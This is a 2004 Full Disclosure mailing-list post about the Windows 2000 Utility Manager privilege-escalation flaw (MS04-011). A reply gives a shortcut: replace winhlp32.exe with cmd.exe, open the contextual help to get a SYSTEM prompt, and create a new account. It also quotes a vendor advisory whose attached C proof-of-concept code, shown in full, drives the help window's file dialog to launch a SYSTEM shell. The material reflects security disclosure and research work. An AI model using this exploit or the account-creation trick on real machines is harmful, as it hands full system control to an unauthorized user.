Full Disclosure mailing list archives
Re: Norton AntiVirus nested file manual scan bypass.....
From: natch <lists () natch net>
Date: Mon, 19 Apr 2004 12:49:26 -0400
Nice, but the faster method is to copy \winnt\system32\cmd.exe to \winnt\winhlp32.exe (can be done as a normal user), hit win+u, then f1. When the command prompt comes up it has elevated privileges. From there you can run MMC.exe, open up \winnt\system32\lusrmgr.msc and create a new account.
No external program needed. The microsoft patch simply removes the contextual help.
- natch Vivek Rathod (Application Security, Inc.) wrote:
Microsoft Windows Utility Manager Vulnerability April 13, 2004 Risk Level: High Summary:A local elevation of privileges vulnerability exists on the Windows Utility Manager that allows to any user to take complete control over the operatingsystem. Versions Affected: All products in the Windows 2000 operating system family. Details:Microsoft Windows 2000 contains support for Accessibility options within the operating system. Accessibility support is a series of assistive technologies within Windows that allow users with disabilities to still be able to access the functions of the operating system. Accessibility support is enabled or disabled through shortcuts built into the operating system, or through the Accessibility Utility Manager. The Utility Manager is an accessibility utility that allows users to check the status of Accessibility programs (Magnifier, Narrator, On- Screen Keyboard) and start or stop them. The Utility Manager can be invoked by pressing Windows Key + U or executing "utilman.exe /start" from the commandline. The Utility Manager Service is enabled by default and runs in the interactive desktop with Local System privileges.The Utility Manager has support for context sensitive help. Users can accessthis by clicking in the "?" on the title bar and then on an object or bypressing the F1 key after selecting an object. In order to display the help,Utility Manager loads winhlp32.exe but does not drop System privileges. Therefore, winhlp32.exe is executed under the Local System account. Whilewinhlp32.exe is executing it is possible to send Windows messages to it andattack it with "Shatter" style attacks.Winhlp32.exe is executed with its main window hidden but it is very trivial tomake it visible. Once the window is made visible, a typical attack wouldinvolve using the “File Open” dialog to execute a program such as “cmd.exe.” Since the Help window has Local System privileges, the executed program willhave the same privileges. Further information is available at: http://www.appsecinc.com/resources/alerts/general/04-0001.html http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908 http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx Fix:http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=enAcknowledgments:Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application Security, Inc. (http://www.appsecinc.com) and toBrett Moore of Security-Assessment.com (http://security-assessment.com). Please find the proof-of-concept exploit code attached ___________________________________________ AppSecInc Team SHATTER Tel: 1-866-927-7732 E-mail: shatter () appsecinc com Web: www.appsecinc.com Application Security, Inc. "Securing Business by Securing Enterprise Applications" ------------------------------------------------------------------------ // By Cesar Cerrudo (cesar () appsecinc com) // Local elevation of priviliges exploit for Windows Utility Manager // Gives you a shell with system privileges // If you have problems try changing Sleep() values. #include <stdio.h> #include <windows.h> #include <commctrl.h> #include <Winuser.h> int main(int argc, char *argv[]) { HWND lHandle, lHandle2; POINT point; char sText[]="%windir%\\system32\\cmd.ex?"; // run utility manager system("utilman.exe /start"); Sleep(500); // execute contextual help SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0); Sleep(500); // open file open dialog windown in Windows Help PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0); Sleep(500); // find open file dialog window lHandle = FindWindow("#32770","Open"); // get input box handle lHandle2 = GetDlgItem(lHandle, 0x47C); Sleep(500); // set text to filter listview to display only cmd.exe SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText); Sleep(800); // send return SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0); //get navigation bar handle lHandle2 = GetDlgItem(lHandle, 0x4A0); //send tab SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0); Sleep(500); lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL); //get list view handle lHandle2 = GetDlgItem(lHandle2, 0x1); SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char Sleep(500); // popup context menu PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0); Sleep(1000); // get context menu handle point.x =10; point.y =30; lHandle2=WindowFromPoint(point); SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window return(0); }
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Norton AntiVirus nested file manual scan bypass..... bipin gautam (Apr 17)
- Re: Norton AntiVirus nested file manual scan bypass.....[silent patch???] bipin gautam (Apr 17)
- Re: Norton AntiVirus nested file manual scan bypass..... natch (Apr 19)
- Re: Norton AntiVirus nested file manual scan bypass..... Esteban Martínez Fayó (Apr 21)